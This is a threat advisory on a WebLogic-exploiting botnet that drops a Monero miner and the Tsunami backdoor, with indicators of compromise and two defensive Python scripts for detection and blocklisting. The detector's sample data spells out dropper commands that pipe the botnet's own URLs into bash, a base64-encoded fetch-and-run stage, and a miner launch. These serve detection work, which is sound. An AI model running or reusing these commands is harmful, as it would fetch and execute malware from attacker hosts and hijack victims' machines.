Severity
Medium
Analysis Summary
A botnet has been detected that propagates by exploiting Oracle WebLogic Server. It carries two payloads: a Monero (XMR) miner and Tsunami, a Linux IRC-controlled backdoor and DDoS bot. The campaign primarily targets cloud servers. In September an earlier version of the botnet spread through misconfigured, internet-exposed Docker API endpoints. Interestingly, the current version also contains unused code for exploiting Redis and for brute-forcing SSH. The botnet establishes persistence in several ways, kills running processes (notably competing mining tools) and disables EDR agents. It uses base64-encoded intermediate-stage shell scripts and base64-encoded commands to download and execute Python scripts.
Initial access is gained through the Oracle WebLogic Server remote code execution vulnerability CVE-2020-14882. The campaign uses multiple shell and Python scripts with different drop locations and retrieves its binaries from hosting web servers via hard-coded IP addresses and domains.
Stage 1 executes two payloads: a shell script named xms and a Python script. xms is piped straight from curl into bash; if that fails it is fetched with wget, executed and then deleted to hinder analysis. The Python script is fetched and executed through base64-encoded commands to evade detection and analysis. xms then attempts to infect hosts the compromised server has previously connected to, and lists running processes to harvest information about active SSH connections. The XMR miner also targets Windows servers, as shown by the .exe binaries hosted on the same FTP server.
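The stage-1 behaviour described above (download piped into a shell, base64-decoded commands, a script executed and then deleted, contact with the listed hosts) is exactly what a host-based hunt should look for. The following is an added example, not code from Rewterz or from the botnet: it scans process command lines (for instance auditd EXECVE records or an EDR process feed) for those patterns and also decodes base64 tokens so that indicators hidden inside an encoded command are still matched. The sample command lines are constructed for illustration; the file name xms under bash.givemexyz.in is an assumption, since the advisory does not give that URL.

```python
"""Heuristic detection of the stage-1 dropper behaviour described above.

Added example (not Rewterz's or the botnet's code). Flags download-to-shell
pipes, base64-decoded commands, execute-then-delete sequences and references
to the advisory's domains/IPs, including references hidden inside base64.
"""
import base64
import re

# Indicators copied from the advisory, with the defanging brackets removed.
IOC_DOMAINS = {"bash.givemexyz.in", "xmr.givemexyz.in", "pool.supportxmr.com"}
IOC_IPS = {"205.185.116.78", "66.70.218.40", "209.141.35.17",
           "104.244.75.25", "198.98.57.217", "194.156.99.30"}

# curl/wget output piped straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b")
# base64 decoding on the command line (shell or Python form).
B64_DECODE = re.compile(r"base64\s+(-d|--decode)\b|b64decode\(")
# A script run by a shell and later removed by rm with the same path.
EXEC_THEN_RM = re.compile(r"\b(?:ba)?sh\s+([^\s;&|]+).*?\brm\s+(?:-\w+\s+)*\1(?:\s|$)")
# Candidate base64 tokens; 20+ characters so ordinary arguments rarely match.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_b64_tokens(cmdline):
    """Decode every base64-looking token in cmdline to printable ASCII text.

    Tokens that are not valid base64, or that do not decode to printable
    text, are dropped so that hashes and odd paths do not produce noise.
    """
    out = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text and all(c.isprintable() or c in "\n\t" for c in text):
            out.append(text)
    return out


def ioc_hits(text):
    """Return the advisory domains and IPs that occur in text."""
    return {ioc for ioc in IOC_DOMAINS | IOC_IPS if ioc in text}


def analyse(cmdline):
    """Return a sorted list of findings for one command line ([] = clean)."""
    findings = set()
    if PIPE_TO_SHELL.search(cmdline):
        findings.add("download piped into shell")
    if B64_DECODE.search(cmdline):
        findings.add("base64-decoded command")
    if EXEC_THEN_RM.search(cmdline):
        findings.add("script executed then deleted")
    for ioc in ioc_hits(cmdline):
        findings.add("IOC " + ioc)
    for text in decode_b64_tokens(cmdline):
        for ioc in ioc_hits(text):
            findings.add("IOC " + ioc + " (inside base64)")
    return sorted(findings)


def scan(lines):
    """Map the index of every flagged line to its findings."""
    flagged = {}
    for i, line in enumerate(lines):
        findings = analyse(line)
        if findings:
            flagged[i] = findings
    return flagged


# Constructed sample command lines (not captured from a real incident).
# The encoded stage below reuses the b.py URL from the advisory's IOC list.
STAGE1_PY = "curl -s http://205.185.116.78/b.py -o /tmp/.b.py; python /tmp/.b.py"
SAMPLE_LINES = [
    "curl -fsSL http://bash.givemexyz.in/xms | bash || wget -q -O- http://bash.givemexyz.in/xms | bash",
    "bash -c 'echo " + base64.b64encode(STAGE1_PY.encode()).decode() + " | base64 -d | bash'",
    "curl -fsSL https://example.com/release.tar.gz -o /tmp/release.tar.gz",
    "/tmp/.X11-unix/xmrig -o pool.supportxmr.com:3333 --donate-level 1",
    "ps -ef | grep ssh",
    "wget -q http://bash.givemexyz.in/xms -O /tmp/xms; bash /tmp/xms; rm -f /tmp/xms",
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LINES).items():
        print(idx, findings)
```

The benign curl download (line 3, saved with -o and never piped into a shell) and the plain ps invocation are not flagged, which is the point of matching the pipe and the decode step rather than the tools themselves. The base64 decoding is what catches the b.py URL in line 2, where the raw command line contains no indicator at all.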
Impact
- Unauthorized Remote Code Execution
- Unauthorized Access
- Process Termination
- Detection Evasion
- Unauthorized Resource Consumption
Indicators of Compromise
Domain Name
- icanhazip[.]com
- bash[.]givemexyz[.]in
- pool[.]supportxmr[.]com
- xmr[.]givemexyz[.]in
MD5
- 01581ccc96ce7ccc15205bb859d9e6bd
- cd7ca50a01fc9c6e8fdc8c3d5e6100f0
- 8bfc072d37f41190515f8dc00a59fb2e
- 5954b9c0ee8490f6f1215bace6f6c6e4
- ee48aa6068988649e41febfa0e3b2169
- c4d44eed4916675dd408ff0b3562fb1f
- 5f15d232552301b9e53d597666f610ad
- 528cfc90fd59af990c2ebc18c0df9b47
- 790c54d34b09f078a24cf27d6c91740e
- 9a9a2ffdfa4d2586eef0d1d987b57e9e
- 8bcf9e1f24093bbf32fbbc3630a0153c
- eefc0ce93d254982fbbcd26460f3d10d
- b1fc3486f3f4d3f23fcbf8b8b0522bf8
- f0551696774f66ad3485445d9e3f7214
SHA-256
- 72acbfdeadfa31d7ccda7fdcc93944b1948e263239af8850e5b44c518da0a4c5
- fdc7920b09290b8dedc84c82883b7a1105c2fbad75e42aea4dc165de8e1796e3
- 35e45d556443c8bf4498d8968ab2a79e751fc2d359bf9f6b4dfd86d417f17cfb
- 6f7393474c6f3c452513231d1e3fa07ed9dcc8d53a1bb2d680c78e9aa03f8f9d
- 9b8280f5ce25f1db676db6e79c60c07e61996b2b68efa6d53e017f34cbf9a872
- 855557e415b485cedb9dc2c6f96d524143108aff2f84497528a8fcddf2dc86a2
- 22e3611cb2b156c3dc2d192b65707aac7787955d7dc120dfbc09aef8e12251b5
- b07bf6e14050c1c56c9b80155417370b4704eb0655cfc18bb4259956162c3814
- 508ec039ca9885f1afc6f15bb70adfa9ed32f9c2d0bff511052edb39898951c7
- 8dbd281c98c8e176621566e3a77eb8a3b7ae4f254773d56f7033f903dd09a043
- 030f41373567846ee18716605dea3ef94d1861b9c32b664d25026d41c3557c00
- 9aa8a11a52b21035ef7badb3f709fa9aa7e757788ad6100b4086f1c6a18c8ab2
- 1d804c5dfa6da0db4a4465232ad9117003df2ea8f0fc68d9e48700d4373a4568
- 1225cc15a71886e5b11fca3dc3b4c4bcde39f4c7c9fbce6bad5e4d3ceee21b3a
SHA-1
- 2940e96f15345149143c53143a87fd9dce45d0ac
- e632f6b93f9e3d3f90ac2068af0b9f1ccee3cd89
- 2d9600a0697de84522b4e65d9be02b9ed9352b4d
- 2132c65f23f8e5a3c533bfa4ab73562c476795e0
- 73c2099c703c9e644172ff58fd49622c06bf2784
- 57279a4f3ccd3f6abbc2c306682438234241598b
- 2847609cb04158c6f8e57ec65d63fabc68577a07
- 9173ca39c025c322864b05a1cd44c022925d7ffc
- 87fe997bb49499d1f743da9840618e30aeb5d24e
- 01ebd97e50edc39ade8cefacaffe5bef5c49bf15
- adaaf46b2bd14a05e58a460e0e2115e696c182fa
- bae9b44362654ef283cbd197bca4d2b3aca8868d
- 7bfa2404bc9733205d2374b92fb3ebf57410228f
- d5f53aa9b9e9899fa511b199230159dfbf215dad
Source IP
- 205[.]185[.]116[.]78
- 66[.]70[.]218[.]40
- 209[.]141[.]35[.]17
- 104[.]244[.]75[.]25
- 198[.]98[.]57[.]217
- 194[.]156[.]99[.]30
URL
- http[:]//205[.]185[.]116[.]78/b[.]py
- http[:]//bash[.]givemexyz[.]in/dd[.]py
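The indicators above are defanged ([.] and [:] brackets) and grouped by type, so before they can be blocked they have to be refanged and routed to the right control. The following is an added example, not part of the Rewterz advisory: it parses the indicator list as printed on this page, classifies each entry by its shape, and emits DNS RPZ lines for the domains, iptables rules for the IPs (URL hosts are folded into whichever list fits) and a hash set for EDR or YARA matching. IOC_TEXT is copied from the sections above with the hash lists shortened to one or two entries each.

```python
"""Refang and classify the advisory's indicators, then build blocklists.

Added example, not Rewterz's code. IOC_TEXT is an excerpt of the indicator
lists printed in the advisory above (hash lists truncated).
"""
import re
from urllib.parse import urlparse

IOC_TEXT = """
Domain Name
- icanhazip[.]com
- bash[.]givemexyz[.]in
- pool[.]supportxmr[.]com
- xmr[.]givemexyz[.]in
MD5
- 01581ccc96ce7ccc15205bb859d9e6bd
- cd7ca50a01fc9c6e8fdc8c3d5e6100f0
SHA-256
- 72acbfdeadfa31d7ccda7fdcc93944b1948e263239af8850e5b44c518da0a4c5
SHA-1
- 2940e96f15345149143c53143a87fd9dce45d0ac
Source IP
- 205[.]185[.]116[.]78
- 66[.]70[.]218[.]40
URL
- http[:]//205[.]185[.]116[.]78/b[.]py
- http[:]//bash[.]givemexyz[.]in/dd[.]py
"""

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
HEX_LEN_TO_TYPE = {32: "md5", 40: "sha1", 64: "sha256"}


def refang(indicator):
    """Undo the common defanging conventions used in advisories."""
    return (indicator.replace("[.]", ".").replace("[:]", ":")
            .replace("hxxp", "http"))


def classify(indicator):
    """Return url, ip, md5, sha1, sha256 or domain based on shape (None if unknown)."""
    if "://" in indicator:
        return "url"
    if IPV4.match(indicator):
        return "ip"
    if re.fullmatch(r"[0-9a-fA-F]+", indicator) and len(indicator) in HEX_LEN_TO_TYPE:
        return HEX_LEN_TO_TYPE[len(indicator)]
    if re.fullmatch(r"[a-z0-9.-]+\.[a-z]{2,}", indicator.lower()):
        return "domain"
    return None


def parse_iocs(text):
    """Parse '- indicator' bullet lines into {type: [indicators]}.

    Section headings are ignored: the indicator's own shape is more reliable
    than the label a page puts above it.
    """
    iocs = {}
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("- "):
            continue
        indicator = refang(line[2:].strip())
        kind = classify(indicator)
        if kind:
            iocs.setdefault(kind, []).append(indicator)
    return iocs


def blocklists(iocs):
    """Build RPZ lines (domains), iptables rules (IPs) and a lowercase hash set."""
    domains = set(iocs.get("domain", []))
    ips = set(iocs.get("ip", []))
    for url in iocs.get("url", []):
        host = urlparse(url).hostname
        (ips if IPV4.match(host) else domains).add(host)
    rpz = []
    for d in sorted(domains):
        rpz.append(f"{d} CNAME .")       # NXDOMAIN the name itself...
        rpz.append(f"*.{d} CNAME .")     # ...and any subdomain
    iptables = [f"iptables -A OUTPUT -d {ip} -j DROP" for ip in sorted(ips)]
    hashes = {h.lower() for k in ("md5", "sha1", "sha256") for h in iocs.get(k, [])}
    return {"rpz": rpz, "iptables": iptables, "hashes": hashes}


if __name__ == "__main__":
    for section, lines in blocklists(parse_iocs(IOC_TEXT)).items():
        print(section)
        for entry in sorted(lines):
            print("  " + entry)
```

One caveat before deploying the output: icanhazip[.]com is a public "what is my IP" service that the malware uses to learn the victim's external address, and legitimate tooling on the same hosts may use it too, so treat it as a detection signal rather than an unconditional block unless you have confirmed nothing else depends on it.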
Remediation
- Block the threat indicators at their respective controls (DNS, proxy and firewall for the domains, IPs and URLs; EDR hash blocklists for the file hashes).
- Apply Oracle's patch for CVE-2020-14882 and keep all systems and software at the latest patched versions; do not expose the WebLogic Administration Console, the Docker API or Redis to the internet.
- Maintain a strong password policy, enable multifactor authentication where possible and prefer key-based SSH authentication, since the botnet carries SSH brute-force code.
- Hunt for the dropper behaviour described above: curl or wget output piped into a shell, base64-decoded commands, unexpected miner processes and outbound connections to pool[.]supportxmr[.]com.